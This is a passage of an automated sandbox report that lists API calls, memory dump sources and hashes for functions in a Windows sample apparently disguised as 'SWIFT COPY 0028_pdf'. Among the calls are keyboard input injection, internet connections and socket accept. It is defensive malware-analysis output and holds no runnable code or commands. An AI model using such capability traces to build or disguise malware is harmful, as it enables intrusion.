                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: msctls_trackbar32
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00942350,?), ref: 009422A1
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 009422A8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: RoInitialize$combase.dll
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00942276), ref: 00942376
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0094237D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: RoUninitialize$combase.dll
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: LocalTime__swprintf
                                                                                    • String ID: %.3d$WIN_XPe
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,009242EC,?,009242AA,?), ref: 00924304
                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00924316
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,009821FB,?,009823EF), ref: 00982213
                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00982225
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: GetProcessId$kernel32.dll
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,009241BB,00924341,?,0092422F,?,009241BB,?,?,?,?,009239FE,?,00000001), ref: 00924359
                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0092436B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(oleaut32.dll,?,0096051D,?,009605FE), ref: 00960547
                                                                                    • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00960559
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0096052F,?,009606D7), ref: 00960572
                                                                                    • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00960584
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,0097ECBE,?,0097EBBB), ref: 0097ECD6
                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0097ECE8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                    • API String ID: 2574300362-1816364905
                                                                                    • Opcode ID: 642298fdb4566f650b99e4f31e2cc24e8670945d8778e8d00ca78b4993b700ab
                                                                                    • Instruction ID: 4c321ff2483448a8840e5d69b61edd9cdf3bd556fbc632b293b84d3d646d496a
                                                                                    • Opcode Fuzzy Hash: 642298fdb4566f650b99e4f31e2cc24e8670945d8778e8d00ca78b4993b700ab
                                                                                    • Instruction Fuzzy Hash: 0FD0A7364587239FCB255F61E84870277E8AF05304B04C45EF88AD2650DB70C8809A50
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0097BAD3,00000001,0097B6EE,?,009BDC00), ref: 0097BAEB
                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0097BAFD
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                    • API String ID: 2574300362-199464113
                                                                                    • Opcode ID: 1e275b83dff28e71ac3d593709fe1ce34b68271e680a0bbadbe5ffcba01de9c4
                                                                                    • Instruction ID: e5f361b179266f8b9c61f2150c780bc45441d7edfd4fccc29f737bf2ba34ba99
                                                                                    • Opcode Fuzzy Hash: 1e275b83dff28e71ac3d593709fe1ce34b68271e680a0bbadbe5ffcba01de9c4
                                                                                    • Instruction Fuzzy Hash: F9D0A7319587129FC7345F61E848B1177D8AF05304B00C41AEC47D2650D770C880C650
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00983BD1,?,00983E06), ref: 00983BE9
                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00983BFB
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                    • API String ID: 2574300362-4033151799
                                                                                    • Opcode ID: 855acfe91806342cc7fa82a948b78bcea223f323d3b6ba0d348dd7ca367a5876
                                                                                    • Instruction ID: 9418d8b42bcc7debac04717e13a62e46d9f61dba67f927395e8e3446f93e3359
                                                                                    • Opcode Fuzzy Hash: 855acfe91806342cc7fa82a948b78bcea223f323d3b6ba0d348dd7ca367a5876
                                                                                    • Instruction Fuzzy Hash: E9D0A770458712AFC7206FA0E808603BAF8AF02718B10C41AE887E2750D7B0C4808F50
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 419f84b499683b24568e281e98b7e76acc422792b7b613fe9035c7e83278c1e1
                                                                                    • Instruction ID: 2a56c41b475529033612fd853af9dfffe6545cccbedf24cc8ad6066a1959924f
                                                                                    • Opcode Fuzzy Hash: 419f84b499683b24568e281e98b7e76acc422792b7b613fe9035c7e83278c1e1
                                                                                    • Instruction Fuzzy Hash: 41C15D75A0021AEFEB14CF95C884BAEB7B9FF48701F108598ED46AB291D730DE45DB90
                                                                                    APIs
                                                                                    • CoInitialize.OLE32(00000000), ref: 0097AAB4
                                                                                    • CoUninitialize.OLE32 ref: 0097AABF
                                                                                      • Part of subcall function 00960213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0096027B
                                                                                    • VariantInit.OLEAUT32(?), ref: 0097AACA
                                                                                    • VariantClear.OLEAUT32(?), ref: 0097AD9D
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                    • String ID:
                                                                                    • API String ID: 780911581-0
                                                                                    • Opcode ID: b4c210e0f0aab6e68ea51629b1d731aeecbf844a2595afca0ca1a172dc8b2267
                                                                                    • Instruction ID: 23280dbf1fe4255741e3c331ab0f366acb10bb1b2dad1617a4365a9391a0ac64
                                                                                    • Opcode Fuzzy Hash: b4c210e0f0aab6e68ea51629b1d731aeecbf844a2595afca0ca1a172dc8b2267
                                                                                    • Instruction Fuzzy Hash: 72A135762047119FCB15EF14C491B1EB7E9BF88710F148859FA9A9B3A2CB34ED44CB86
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: Variant$AllocClearCopyInitString
                                                                                    • String ID:
                                                                                    • API String ID: 2808897238-0
                                                                                    • Opcode ID: 2024122bf9d7566755a36fc2c1c671d55c405f675d5b39863e8b1d8a46a04f64
                                                                                    • Instruction ID: fe1b81ee904b0a1a87af82f0bf805dfec8082f4c7a61570251de0d60d28a4fee
                                                                                    • Opcode Fuzzy Hash: 2024122bf9d7566755a36fc2c1c671d55c405f675d5b39863e8b1d8a46a04f64
                                                                                    • Instruction Fuzzy Hash: 50518330604306DBEB24DF67D89576EB3E9EF85315F20882FE956CB2E1DB7898488705
                                                                                    APIs
                                                                                    Similarity
                                                                                    • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                    • String ID:
                                                                                    • API String ID: 3877424927-0
                                                                                    • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                    • Instruction ID: c700c5d7ad86ed14229be10c46d54cb21756ba0981380e1917a773fb4784a6cb
                                                                                    • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                    • Instruction Fuzzy Hash: EF5195B0A00306ABDB289FB98885E6E77B9AF40324F25C729F875967D0D7759F508F40
                                                                                    APIs
                                                                                    • GetWindowRect.USER32(00FF5CC0,?), ref: 0098C544
                                                                                    • ScreenToClient.USER32(?,00000002), ref: 0098C574
                                                                                    • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0098C5DA
                                                                                    Similarity
                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                    • String ID:
                                                                                    • API String ID: 3880355969-0
                                                                                    • Opcode ID: 57e6c1b07240ddea9845fa28e99a0ea4aa6c51d675cee7094b923d8af3a82cd9
                                                                                    • Instruction ID: bdea790b284fe93d927d969f31a9b6bbaf52f234542d8957c5ef09ba26aabc52
                                                                                    • Opcode Fuzzy Hash: 57e6c1b07240ddea9845fa28e99a0ea4aa6c51d675cee7094b923d8af3a82cd9
                                                                                    • Instruction Fuzzy Hash: 31513FB5904209EFCF10EF68C880AAE7BB9EF55720F108669F9559B390D730ED41DBA0
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0095C462
                                                                                    • __itow.LIBCMT ref: 0095C49C
                                                                                      • Part of subcall function 0095C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0095C753
                                                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0095C505
                                                                                    • __itow.LIBCMT ref: 0095C55A
                                                                                    Similarity
                                                                                    • API ID: MessageSend$__itow
                                                                                    • String ID:
                                                                                    • API String ID: 3379773720-0
                                                                                    • Opcode ID: 9b3b1b16b49d0216ed6ae4eeadc048e024ae8534f00282d0c606569784d5091c
                                                                                    • Instruction ID: 80f0f676a185f7ab529fe388b2f29e35fb5d07f1cda4091186752e2471fa7eba
                                                                                    • Opcode Fuzzy Hash: 9b3b1b16b49d0216ed6ae4eeadc048e024ae8534f00282d0c606569784d5091c
                                                                                    • Instruction Fuzzy Hash: 1E41F8B1A00318AFDF21DF55D855FEE7BB9AF89701F000019FD05A7292DB749A49CBA1
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00963966
                                                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00963982
                                                                                    • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 009639EF
                                                                                    • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00963A4D
                                                                                    Similarity
                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                    • String ID:
                                                                                    • API String ID: 432972143-0
                                                                                    • Opcode ID: b085ab73c864c7d54ea631759ecc833c67143c3f582c5e1603b4530db779ad38
                                                                                    • Instruction ID: 08cbfffd93f60efb1ebc61f45617f0c2a6ee0018d9679a1a0032db567e393eaf
                                                                                    • Opcode Fuzzy Hash: b085ab73c864c7d54ea631759ecc833c67143c3f582c5e1603b4530db779ad38
                                                                                    • Instruction Fuzzy Hash: 20411870E04648EEEF208B64C805BFDBBB99F55310F04815AF4C2922C1C7B88E85EB65
                                                                                    APIs
                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0098B5D1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: InvalidateRect
                                                                                    • String ID:
                                                                                    • API String ID: 634782764-0
                                                                                    • Opcode ID: 7b4c162b5113e78043a7794c458da8530fe0ad757d56f23cf039bf0e0fddafd8
                                                                                    • Instruction ID: fecbdca88ce2ae471880c0458f405b81140394f87b766c523f8112d365ab5cc1
                                                                                    • Opcode Fuzzy Hash: 7b4c162b5113e78043a7794c458da8530fe0ad757d56f23cf039bf0e0fddafd8
                                                                                    • Instruction Fuzzy Hash: E531C175611208BFEF30AF18CC89FAC7BA9EB06720F5C4511FA52D63E1E734A9409B95
                                                                                    APIs
                                                                                    • ClientToScreen.USER32(?,?), ref: 0098D807
                                                                                    • GetWindowRect.USER32(?,?), ref: 0098D87D
                                                                                    • PtInRect.USER32(?,?,0098ED5A), ref: 0098D88D
                                                                                    • MessageBeep.USER32(00000000), ref: 0098D8FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1352109105-0
                                                                                    • Opcode ID: 0bb46b6f3faf38a61d03a36a42eb0768e7c844c2f5bee06730bc3ac1c88cf1fa
                                                                                    • Instruction ID: 9b5d3d9554e5f44e641a55a2d529ae110146c642260a22c7313ced9707414a64
                                                                                    • Opcode Fuzzy Hash: 0bb46b6f3faf38a61d03a36a42eb0768e7c844c2f5bee06730bc3ac1c88cf1fa
                                                                                    • Instruction Fuzzy Hash: 15419A70A06219EFCB11EF58D884BA97BF9FF49710F1881A9E415CB3A0D330E941DB80
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00963AB8
                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00963AD4
                                                                                    • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00963B34
                                                                                    • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00963B92
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                    • String ID:
                                                                                    • API String ID: 432972143-0
                                                                                    • Opcode ID: c8fbbadd8b7e1e7d98786e535d51cfd7de6debfdef92ab92a7559ed0f3e56453
                                                                                    • Instruction ID: fffac63fb88407765de1251292cf7a56d79d8bd1022e7c3b174272a18f023d52
                                                                                    • Opcode Fuzzy Hash: c8fbbadd8b7e1e7d98786e535d51cfd7de6debfdef92ab92a7559ed0f3e56453
                                                                                    • Instruction Fuzzy Hash: D3312630E04258AEFF218B758819BFE7BA99F56310F04815AE482932D1C7758F45D761
                                                                                    APIs
                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00954038
                                                                                    • __isleadbyte_l.LIBCMT ref: 00954066
                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00954094
                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 009540CA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                    • String ID:
                                                                                    • API String ID: 3058430110-0
                                                                                    • Opcode ID: c789b447e914c2f746b143bd15be672bd91d65cd131a74065bf0d99030657128
                                                                                    • Instruction ID: 835a1f44b93af3e6821692fdf4a64396f07d1bca6bfa7041edde27e5afd596ad
                                                                                    • Opcode Fuzzy Hash: c789b447e914c2f746b143bd15be672bd91d65cd131a74065bf0d99030657128
                                                                                    • Instruction Fuzzy Hash: DB31D230604206EFDB61DF76C844BAA7BA9FF41316F254428EA618B1D0E731D8D8DB90
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32 ref: 00987CB9
                                                                                      • Part of subcall function 00965F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00965F6F
                                                                                      • Part of subcall function 00965F55: GetCurrentThreadId.KERNEL32 ref: 00965F76
                                                                                      • Part of subcall function 00965F55: AttachThreadInput.USER32(00000000,?,0096781F), ref: 00965F7D
                                                                                    • GetCaretPos.USER32(?), ref: 00987CCA
                                                                                    • ClientToScreen.USER32(00000000,?), ref: 00987D03
                                                                                    • GetForegroundWindow.USER32 ref: 00987D09
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                    • String ID:
                                                                                    • API String ID: 2759813231-0
                                                                                    • Opcode ID: 78fc938b448450d037d3974889c17a04c9696caa840add18c509141954649077
                                                                                    • Instruction ID: 18237152e45f8f3715084f44da8211820d0e693c709e049745f7d7cbf6ec214a
                                                                                    • Opcode Fuzzy Hash: 78fc938b448450d037d3974889c17a04c9696caa840add18c509141954649077
                                                                                    • Instruction Fuzzy Hash: 9B311EB2900108AFDB00EFA5C845AEFFBF9EF98314F118466F855E3211DA319E058FA0
                                                                                    APIs
                                                                                      • Part of subcall function 0093B34E: GetWindowLongW.USER32(?,000000EB), ref: 0093B35F
                                                                                    • GetCursorPos.USER32(?), ref: 0098F211
                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0099E4C0,?,?,?,?,?), ref: 0098F226
                                                                                    • GetCursorPos.USER32(?), ref: 0098F270
                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0099E4C0,?,?,?), ref: 0098F2A6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2864067406-0
                                                                                    • Opcode ID: 6b28bc30c3deafbeb9604c607958d3c015e12825a24766f7e306b8590a820cc4
                                                                                    • Instruction ID: 9dfa465dedb329f1efd2f2f05c87d313d634672a2280a0a5d54a00682f05e945
                                                                                    • Opcode Fuzzy Hash: 6b28bc30c3deafbeb9604c607958d3c015e12825a24766f7e306b8590a820cc4
                                                                                    • Instruction Fuzzy Hash: DF21B139601018AFDB259F94C868EEEBBB9EF4A710F044069F9154B2A1D3309D50EBA0
                                                                                    APIs
                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00974358
                                                                                      • Part of subcall function 009743E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00974401
                                                                                      • Part of subcall function 009743E2: InternetCloseHandle.WININET(00000000), ref: 0097449E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$CloseConnectHandleOpen
                                                                                    • String ID:
                                                                                    • API String ID: 1463438336-0
                                                                                    • Opcode ID: 7874a8093643e2a4d0fa5f6105f4c209fa9b7527adbd88c9fb78734968a13f40
                                                                                    • Instruction ID: 67352cfc311f4138e3c57c8c06f397ac001fd0455eed0d1570d32b35d3a5148d
                                                                                    • Opcode Fuzzy Hash: 7874a8093643e2a4d0fa5f6105f4c209fa9b7527adbd88c9fb78734968a13f40
                                                                                    • Instruction Fuzzy Hash: 8B21F373205601BFEB159F60DD00FBBB7ADFF84710F00801AFA1E96691DB719820AB90
                                                                                    APIs
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00988AA6
                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00988AC0
                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00988ACE
                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00988ADC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long$AttributesLayered
                                                                                    • String ID:
                                                                                    • API String ID: 2169480361-0
                                                                                    • Opcode ID: fa208428d31210077cb27094ab05b6563b95a7dd984c804c13311fd0481fea60
                                                                                    • Instruction ID: 76c9903d8544b58d0f35e27dec755a535b11f67488402cc54d6651b4e9f48ca0
                                                                                    • Opcode Fuzzy Hash: fa208428d31210077cb27094ab05b6563b95a7dd984c804c13311fd0481fea60
                                                                                    • Instruction Fuzzy Hash: F8119031206121AFDB18AB18DC05FBB779DAF8A320F144519F926C73E2CB74AD018BE4
                                                                                    APIs
                                                                                    • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00978AE0
                                                                                    • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00978AF2
                                                                                    • accept.WSOCK32(00000000,00000000,00000000), ref: 00978AFF
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00978B16
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
